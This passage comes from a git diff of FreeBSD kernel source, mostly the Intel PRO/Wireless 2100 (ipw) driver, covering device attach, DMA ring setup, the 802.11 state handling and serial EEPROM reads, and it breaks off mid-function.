bwn_detach), DEVMETHOD(device_suspend, bwn_suspend), DEVMETHOD(device_resume, bwn_resume), DEVMETHOD_END }; static driver_t bwn_driver = { "bwn", bwn_methods, sizeof(struct bwn_softc) }; static devclass_t bwn_devclass; DRIVER_MODULE(bwn, siba_bwn, bwn_driver, bwn_devclass, 0, 0); MODULE_DEPEND(bwn, siba_bwn, 1, 1, 1); MODULE_DEPEND(bwn, wlan, 1, 1, 1); /* 802.11 media layer */ MODULE_DEPEND(bwn, firmware, 1, 1, 1); /* firmware support */ MODULE_DEPEND(bwn, wlan_amrr, 1, 1, 1); diff --git a/sys/dev/ipw/if_ipw.c b/sys/dev/ipw/if_ipw.c index b5f4fe644945..fe693eb78998 100644 --- a/sys/dev/ipw/if_ipw.c +++ b/sys/dev/ipw/if_ipw.c @@ -1,2725 +1,2725 @@ /*- * Copyright (c) 2004-2006 * Damien Bergamini . All rights reserved. * Copyright (c) 2006 Sam Leffler, Errno Consulting * Copyright (c) 2007 Andrew Thompson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice unmodified, this list of conditions, and the following * disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); /*- * Intel(R) PRO/Wireless 2100 MiniPCI driver * http://www.intel.com/network/connectivity/products/wireless/prowireless_mobile.htm */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IPW_DEBUG #ifdef IPW_DEBUG #define DPRINTF(x) do { if (ipw_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (ipw_debug >= (n)) printf x; } while (0) int ipw_debug = 0; SYSCTL_INT(_debug, OID_AUTO, ipw, CTLFLAG_RW, &ipw_debug, 0, "ipw debug level"); #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif MODULE_DEPEND(ipw, pci, 1, 1, 1); MODULE_DEPEND(ipw, wlan, 1, 1, 1); MODULE_DEPEND(ipw, firmware, 1, 1, 1); struct ipw_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct ipw_ident ipw_ident_table[] = { { 0x8086, 0x1043, "Intel(R) PRO/Wireless 2100 MiniPCI" }, { 0, 0, NULL } }; static struct ieee80211vap *ipw_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void ipw_vap_delete(struct ieee80211vap *); static int ipw_dma_alloc(struct ipw_softc *); static void ipw_release(struct ipw_softc *); static void ipw_media_status(struct ifnet *, struct ifmediareq *); static int ipw_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t ipw_read_prom_word(struct ipw_softc *, uint8_t); static void ipw_rx_cmd_intr(struct ipw_softc *, struct ipw_soft_buf *); static void ipw_rx_newstate_intr(struct ipw_softc *, struct ipw_soft_buf *); static void ipw_rx_data_intr(struct ipw_softc *, struct ipw_status *, struct ipw_soft_bd *, struct ipw_soft_buf *); static void ipw_rx_intr(struct ipw_softc *); static void ipw_release_sbd(struct ipw_softc *, struct ipw_soft_bd *); static void ipw_tx_intr(struct ipw_softc *); static void ipw_intr(void *); static void ipw_dma_map_addr(void *, bus_dma_segment_t *, int, int); static const char * ipw_cmdname(int); static int ipw_cmd(struct ipw_softc *, uint32_t, void *, uint32_t); static int ipw_tx_start(struct ifnet *, struct mbuf *, struct ieee80211_node *); static int ipw_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void ipw_start(struct ifnet *); static void ipw_start_locked(struct ifnet *); static void ipw_watchdog(void *); static int ipw_ioctl(struct ifnet *, u_long, caddr_t); static void ipw_stop_master(struct ipw_softc *); static int ipw_enable(struct ipw_softc *); static int ipw_disable(struct ipw_softc *); static int ipw_reset(struct ipw_softc *); static int ipw_load_ucode(struct ipw_softc *, const char *, int); static int ipw_load_firmware(struct ipw_softc *, const char *, int); static int ipw_config(struct ipw_softc *); static void ipw_assoc(struct ieee80211com *, struct ieee80211vap *); static void ipw_disassoc(struct ieee80211com *, struct ieee80211vap *); static void ipw_init_task(void *, int); static void ipw_init(void *); static void ipw_init_locked(struct ipw_softc *); static void ipw_stop(void *); static void ipw_stop_locked(struct ipw_softc *); static int ipw_sysctl_stats(SYSCTL_HANDLER_ARGS); static int ipw_sysctl_radio(SYSCTL_HANDLER_ARGS); static uint32_t ipw_read_table1(struct ipw_softc *, uint32_t); static void ipw_write_table1(struct ipw_softc *, uint32_t, uint32_t); #if 0 static int ipw_read_table2(struct ipw_softc *, uint32_t, void *, uint32_t *); static void ipw_read_mem_1(struct ipw_softc *, bus_size_t, uint8_t *, bus_size_t); #endif static void ipw_write_mem_1(struct ipw_softc *, bus_size_t, const uint8_t *, bus_size_t); static int ipw_scan(struct ipw_softc *); static void ipw_scan_start(struct ieee80211com *); static void ipw_scan_end(struct ieee80211com *); static void ipw_set_channel(struct ieee80211com *); static void ipw_scan_curchan(struct ieee80211_scan_state *, unsigned long maxdwell); static void ipw_scan_mindwell(struct ieee80211_scan_state *); static int ipw_probe(device_t); static int ipw_attach(device_t); static int ipw_detach(device_t); static int ipw_shutdown(device_t); static int ipw_suspend(device_t); static int ipw_resume(device_t); static device_method_t ipw_methods[] = { /* Device interface */ DEVMETHOD(device_probe, ipw_probe), DEVMETHOD(device_attach, ipw_attach), DEVMETHOD(device_detach, ipw_detach), DEVMETHOD(device_shutdown, ipw_shutdown), DEVMETHOD(device_suspend, ipw_suspend), DEVMETHOD(device_resume, ipw_resume), DEVMETHOD_END }; static driver_t ipw_driver = { "ipw", ipw_methods, sizeof (struct ipw_softc) }; static devclass_t ipw_devclass; DRIVER_MODULE(ipw, pci, ipw_driver, ipw_devclass, NULL, NULL); MODULE_VERSION(ipw, 1); static int ipw_probe(device_t dev) { const struct ipw_ident *ident; for (ident = ipw_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } /* Base Address Register */ static int ipw_attach(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; struct ieee80211_channel *c; uint16_t val; int error, i; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); TASK_INIT(&sc->sc_init_task, 0, ipw_init_task, sc); callout_init_mtx(&sc->sc_wdtimer, &sc->sc_mtx, 0); pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); i = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &i, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &i, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); goto fail1; } if (ipw_reset(sc) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail2; } if (ipw_dma_alloc(sc) != 0) { device_printf(dev, "could not allocate DMA resources\n"); goto fail2; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); goto fail3; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = ipw_init; ifp->if_ioctl = ipw_ioctl; ifp->if_start = ipw_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_DS; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_PMGT /* power save supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i supported */ ; /* read MAC address from EEPROM */ val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 0); macaddr[0] = val >> 8; macaddr[1] = val & 0xff; val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 1); macaddr[2] = val >> 8; macaddr[3] = val & 0xff; val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 2); macaddr[4] = val >> 8; macaddr[5] = val & 0xff; /* set supported .11b channels (read from EEPROM) */ if ((val = ipw_read_prom_word(sc, IPW_EEPROM_CHANNEL_LIST)) == 0) val = 0x7ff; /* default to channels 1-11 */ val <<= 1; for (i = 1; i < 16; i++) { if (val & (1 << i)) { c = &ic->ic_channels[ic->ic_nchans++]; c->ic_freq = ieee80211_ieee2mhz(i, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_B; c->ic_ieee = i; } } /* check support for radio transmitter switch in EEPROM */ if (!(ipw_read_prom_word(sc, IPW_EEPROM_RADIO) & 8)) sc->flags |= IPW_FLAG_HAS_RADIO_SWITCH; ieee80211_ifattach(ic, macaddr); ic->ic_scan_start = ipw_scan_start; ic->ic_scan_end = ipw_scan_end; ic->ic_set_channel = ipw_set_channel; ic->ic_scan_curchan = ipw_scan_curchan; ic->ic_scan_mindwell = ipw_scan_mindwell; ic->ic_raw_xmit = ipw_raw_xmit; ic->ic_vap_create = ipw_vap_create; ic->ic_vap_delete = ipw_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IPW_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IPW_RX_RADIOTAP_PRESENT); /* * Add a few sysctl knobs. */ SYSCTL_ADD_PROC(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "radio", CTLTYPE_INT | CTLFLAG_RD, sc, 0, ipw_sysctl_radio, "I", "radio transmitter switch state (0=off, 1=on)"); SYSCTL_ADD_PROC(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "stats", CTLTYPE_OPAQUE | CTLFLAG_RD, sc, 0, ipw_sysctl_stats, "S", "statistics"); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, ipw_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail4; } if (bootverbose) ieee80211_announce(ic); return 0; fail4: if_free(ifp); fail3: ipw_release(sc); fail2: bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); fail1: bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); fail: mtx_destroy(&sc->sc_mtx); return ENXIO; } static int ipw_detach(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bus_teardown_intr(dev, sc->irq, sc->sc_ih); ieee80211_draintask(ic, &sc->sc_init_task); ipw_stop(sc); ieee80211_ifdetach(ic); callout_drain(&sc->sc_wdtimer); ipw_release(sc); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if_free(ifp); if (sc->sc_firmware != NULL) { firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; } mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * ipw_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; struct ipw_vap *ivp; struct ieee80211vap *vap; const struct firmware *fp; const struct ipw_firmware_hdr *hdr; const char *imagename; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; switch (opmode) { case IEEE80211_M_STA: imagename = "ipw_bss"; break; case IEEE80211_M_IBSS: imagename = "ipw_ibss"; break; case IEEE80211_M_MONITOR: imagename = "ipw_monitor"; break; default: return NULL; } /* * Load firmware image using the firmware(9) subsystem. Doing * this unlocked is ok since we're single-threaded by the * 802.11 layer. */ if (sc->sc_firmware == NULL || strcmp(sc->sc_firmware->name, imagename) != 0) { if (sc->sc_firmware != NULL) firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = firmware_get(imagename); } if (sc->sc_firmware == NULL) { device_printf(sc->sc_dev, "could not load firmware image '%s'\n", imagename); return NULL; } fp = sc->sc_firmware; if (fp->datasize < sizeof *hdr) { device_printf(sc->sc_dev, "firmware image too short %zu\n", fp->datasize); firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; return NULL; } hdr = (const struct ipw_firmware_hdr *)fp->data; if (fp->datasize < sizeof *hdr + le32toh(hdr->mainsz) + le32toh(hdr->ucodesz)) { device_printf(sc->sc_dev, "firmware image too short %zu\n", fp->datasize); firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; return NULL; } ivp = (struct ipw_vap *) malloc(sizeof(struct ipw_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override with driver methods */ ivp->newstate = vap->iv_newstate; vap->iv_newstate = ipw_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ipw_media_status); ic->ic_opmode = opmode; return vap; } static void ipw_vap_delete(struct ieee80211vap *vap) { struct ipw_vap *ivp = IPW_VAP(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static int ipw_dma_alloc(struct ipw_softc *sc) { struct ipw_soft_bd *sbd; struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; bus_addr_t physaddr; int error, i; /* * Allocate parent DMA tag for subsequent allocations. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, BUS_SPACE_MAXSIZE_32BIT, BUS_SPACE_UNRESTRICTED, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &sc->parent_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create parent DMA tag\n"); goto fail; } /* * Allocate and map tx ring. */ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_TBD_SZ, 1, IPW_TBD_SZ, 0, NULL, NULL, &sc->tbd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create tx ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->tbd_dmat, (void **)&sc->tbd_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->tbd_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->tbd_dmat, sc->tbd_map, sc->tbd_list, IPW_TBD_SZ, ipw_dma_map_addr, &sc->tbd_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map tx ring DMA memory\n"); goto fail; } /* * Allocate and map rx ring. */ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_RBD_SZ, 1, IPW_RBD_SZ, 0, NULL, NULL, &sc->rbd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create rx ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->rbd_dmat, (void **)&sc->rbd_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->rbd_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate rx ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->rbd_dmat, sc->rbd_map, sc->rbd_list, IPW_RBD_SZ, ipw_dma_map_addr, &sc->rbd_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map rx ring DMA memory\n"); goto fail; } /* * Allocate and map status ring. */ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_STATUS_SZ, 1, IPW_STATUS_SZ, 0, NULL, NULL, &sc->status_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create status ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->status_dmat, (void **)&sc->status_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->status_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate status ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->status_dmat, sc->status_map, sc->status_list, IPW_STATUS_SZ, ipw_dma_map_addr, &sc->status_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map status ring DMA memory\n"); goto fail; } /* * Allocate command DMA map. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, sizeof (struct ipw_cmd), 1, sizeof (struct ipw_cmd), 0, NULL, NULL, &sc->cmd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create command DMA tag\n"); goto fail; } error = bus_dmamap_create(sc->cmd_dmat, 0, &sc->cmd_map); if (error != 0) { device_printf(sc->sc_dev, "could not create command DMA map\n"); goto fail; } /* * Allocate headers DMA maps. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, sizeof (struct ipw_hdr), 1, sizeof (struct ipw_hdr), 0, NULL, NULL, &sc->hdr_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create header DMA tag\n"); goto fail; } SLIST_INIT(&sc->free_shdr); for (i = 0; i < IPW_NDATA; i++) { shdr = &sc->shdr_list[i]; error = bus_dmamap_create(sc->hdr_dmat, 0, &shdr->map); if (error != 0) { device_printf(sc->sc_dev, "could not create header DMA map\n"); goto fail; } SLIST_INSERT_HEAD(&sc->free_shdr, shdr, next); } /* * Allocate tx buffers DMA maps. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IPW_MAX_NSEG, MCLBYTES, 0, NULL, NULL, &sc->txbuf_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create tx DMA tag\n"); goto fail; } SLIST_INIT(&sc->free_sbuf); for (i = 0; i < IPW_NDATA; i++) { sbuf = &sc->tx_sbuf_list[i]; error = bus_dmamap_create(sc->txbuf_dmat, 0, &sbuf->map); if (error != 0) { device_printf(sc->sc_dev, "could not create tx DMA map\n"); goto fail; } SLIST_INSERT_HEAD(&sc->free_sbuf, sbuf, next); } /* * Initialize tx ring. */ for (i = 0; i < IPW_NTBD; i++) { sbd = &sc->stbd_list[i]; sbd->bd = &sc->tbd_list[i]; sbd->type = IPW_SBD_TYPE_NOASSOC; } /* * Pre-allocate rx buffers and DMA maps. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &sc->rxbuf_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create rx DMA tag\n"); goto fail; } for (i = 0; i < IPW_NRBD; i++) { sbd = &sc->srbd_list[i]; sbuf = &sc->rx_sbuf_list[i]; sbd->bd = &sc->rbd_list[i]; sbuf->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (sbuf->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_create(sc->rxbuf_dmat, 0, &sbuf->map); if (error != 0) { device_printf(sc->sc_dev, "could not create rx DMA map\n"); goto fail; } error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(sbuf->m, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map rx DMA memory\n"); goto fail; } sbd->type = IPW_SBD_TYPE_DATA; sbd->priv = sbuf; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(MCLBYTES); } bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); return 0; fail: ipw_release(sc); return error; } static void ipw_release(struct ipw_softc *sc) { struct ipw_soft_buf *sbuf; int i; if (sc->parent_dmat != NULL) { bus_dma_tag_destroy(sc->parent_dmat); } if (sc->tbd_dmat != NULL) { if (sc->stbd_list != NULL) { bus_dmamap_unload(sc->tbd_dmat, sc->tbd_map); bus_dmamem_free(sc->tbd_dmat, sc->tbd_list, sc->tbd_map); } bus_dma_tag_destroy(sc->tbd_dmat); } if (sc->rbd_dmat != NULL) { if (sc->rbd_list != NULL) { bus_dmamap_unload(sc->rbd_dmat, sc->rbd_map); bus_dmamem_free(sc->rbd_dmat, sc->rbd_list, sc->rbd_map); } bus_dma_tag_destroy(sc->rbd_dmat); } if (sc->status_dmat != NULL) { if (sc->status_list != NULL) { bus_dmamap_unload(sc->status_dmat, sc->status_map); bus_dmamem_free(sc->status_dmat, sc->status_list, sc->status_map); } bus_dma_tag_destroy(sc->status_dmat); } for (i = 0; i < IPW_NTBD; i++) ipw_release_sbd(sc, &sc->stbd_list[i]); if (sc->cmd_dmat != NULL) { bus_dmamap_destroy(sc->cmd_dmat, sc->cmd_map); bus_dma_tag_destroy(sc->cmd_dmat); } if (sc->hdr_dmat != NULL) { for (i = 0; i < IPW_NDATA; i++) bus_dmamap_destroy(sc->hdr_dmat, sc->shdr_list[i].map); bus_dma_tag_destroy(sc->hdr_dmat); } if (sc->txbuf_dmat != NULL) { for (i = 0; i < IPW_NDATA; i++) { bus_dmamap_destroy(sc->txbuf_dmat, sc->tx_sbuf_list[i].map); } bus_dma_tag_destroy(sc->txbuf_dmat); } if (sc->rxbuf_dmat != NULL) { for (i = 0; i < IPW_NRBD; i++) { sbuf = &sc->rx_sbuf_list[i]; if (sbuf->m != NULL) { bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxbuf_dmat, sbuf->map); m_freem(sbuf->m); } bus_dmamap_destroy(sc->rxbuf_dmat, sbuf->map); } bus_dma_tag_destroy(sc->rxbuf_dmat); } } static int ipw_shutdown(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); ipw_stop(sc); return 0; } static int ipw_suspend(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int ipw_resume(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static int ipw_cvtrate(int ipwrate) { switch (ipwrate) { case IPW_RATE_DS1: return 2; case IPW_RATE_DS2: return 4; case IPW_RATE_DS5: return 11; case IPW_RATE_DS11: return 22; } return 0; } /* * The firmware automatically adapts the transmit speed. We report its current * value here. */ static void ipw_media_status(struct ifnet *ifp, struct ifmediareq *imr) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct ipw_softc *sc = ic->ic_ifp->if_softc; /* read current transmission rate from adapter */ vap->iv_bss->ni_txrate = ipw_cvtrate( ipw_read_table1(sc, IPW_INFO_CURRENT_TX_RATE) & 0xf); ieee80211_media_status(ifp, imr); } static int ipw_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ipw_vap *ivp = IPW_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; enum ieee80211_state ostate; DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate], sc->flags)); ostate = vap->iv_state; IEEE80211_UNLOCK(ic); switch (nstate) { case IEEE80211_S_RUN: if (ic->ic_opmode == IEEE80211_M_IBSS) { /* * XXX when joining an ibss network we are called * with a SCAN -> RUN transition on scan complete. * Use that to call ipw_assoc. On completing the * join we are then called again with an AUTH -> RUN * transition and we want to do nothing. This is * all totally bogus and needs to be redone. */ if (ostate == IEEE80211_S_SCAN) ipw_assoc(ic, vap); } break; case IEEE80211_S_INIT: if (sc->flags & IPW_FLAG_ASSOCIATED) ipw_disassoc(ic, vap); break; case IEEE80211_S_AUTH: /* * Move to ASSOC state after the ipw_assoc() call. Firmware * takes care of authentication, after the call we'll receive * only an assoc response which would otherwise be discared * if we are still in AUTH state. */ nstate = IEEE80211_S_ASSOC; ipw_assoc(ic, vap); break; case IEEE80211_S_ASSOC: /* * If we are not transitioning from AUTH then resend the * association request. */ if (ostate != IEEE80211_S_AUTH) ipw_assoc(ic, vap); break; default: break; } IEEE80211_LOCK(ic); return ivp->newstate(vap, nstate, arg); } /* * Read 16 bits at address 'addr' from the serial EEPROM. */ static uint16_t ipw_read_prom_word(struct ipw_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ IPW_EEPROM_CTL(sc, 0); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); /* write start bit (1) */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D | IPW_EEPROM_C); /* write READ opcode (10) */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_D | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); /* write address A7-A0 */ for (n = 7; n >= 0; n--) { IPW_EEPROM_CTL(sc, IPW_EEPROM_S | (((addr >> n) & 1) << IPW_EEPROM_SHIFT_D)); IPW_EEPROM_CTL(sc, IPW_EEPROM_S | (((addr >> n) & 1) << IPW_EEPROM_SHIFT_D) | IPW_EEPROM_C); } IPW_EEPROM_CTL(sc, IPW_EEPROM_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { IPW_EEPROM_CTL(sc, IPW_EEPROM_S | IPW_EEPROM_C); IPW_EEPROM_CTL(sc, IPW_EEPROM_S); tmp = MEM_READ_4(sc, IPW_MEM_EEPROM_CTL); val |= ((tmp & IPW_EEPROM_Q) >> IPW_EEPROM_SHIFT_Q) << n; } IPW_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ IPW_EEPROM_CTL(sc, IPW_EEPROM_S); IPW_EEPROM_CTL(sc, 0); IPW_EEPROM_CTL(sc, IPW_EEPROM_C); return le16toh(val); } static void ipw_rx_cmd_intr(struct ipw_softc *sc, struct ipw_soft_buf *sbuf) { struct ipw_cmd *cmd; bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); cmd = mtod(sbuf->m, struct ipw_cmd *); DPRINTFN(9, ("cmd ack'ed %s(%u, %u, %u, %u, %u)\n", ipw_cmdname(le32toh(cmd->type)), le32toh(cmd->type), le32toh(cmd->subtype), le32toh(cmd->seq), le32toh(cmd->len), le32toh(cmd->status))); sc->flags &= ~IPW_FLAG_BUSY; wakeup(sc); } static void ipw_rx_newstate_intr(struct ipw_softc *sc, struct ipw_soft_buf *sbuf) { #define IEEESTATE(vap) ieee80211_state_name[vap->iv_state] struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = 